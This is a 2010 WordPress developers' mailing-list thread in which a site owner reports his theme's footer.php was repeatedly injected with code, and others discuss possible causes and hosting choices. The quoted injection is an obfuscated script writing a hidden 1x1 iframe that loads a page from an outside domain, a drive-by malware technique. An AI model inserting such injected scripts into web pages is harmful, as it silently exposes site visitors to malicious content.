[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Mladen Adamovic mladen.adamovic at gmail.com
Sun Oct 31 16:50:06 UTC 2010


Regarding hosting - I have other websites hosted at my dreamhost account and
they haven't been hacked hacked so far . That's good otherwise I'll have
days of work to fix it.

Godaddy has slow and unresponsive panel comparing to dreamhost - I have some
websites hosted there as well.

I understand that some individuals and companies are offering Wordpress
hosting however for me Blogger could do - and it's free. Since my blog has
around 25 readers I don't have economical reasons to pay for managed
wordpress hosting.

Regards



On Sun, Oct 31, 2010 at 4:17 PM, Vid Luther <vid at zippykid.com> wrote:

> Mladen,
>  Instead of switching platforms completely, I would recommend first
> changing hosts, go with mediatemple, godaddy, rackspace, page.ly,
> wpengine, my company, or even godaddy.. their UI sucks, but their phone
> support is fairly decent.
>
> As for the exploit, it may not be a wordpress exploit, but an ftp
> attack, as it's just looking for filesystem paths and injecting to it.
>
> I'm assuming by default theme footer, you meant twentyten theme, and
> footer.php ?
>
>
>
> Mladen Adamovic wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it
> was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify
> exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
>
> --
> Vid Luther
> Founder
> ZippyKid
> http://zippykid.com/
> 210-789-0369
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list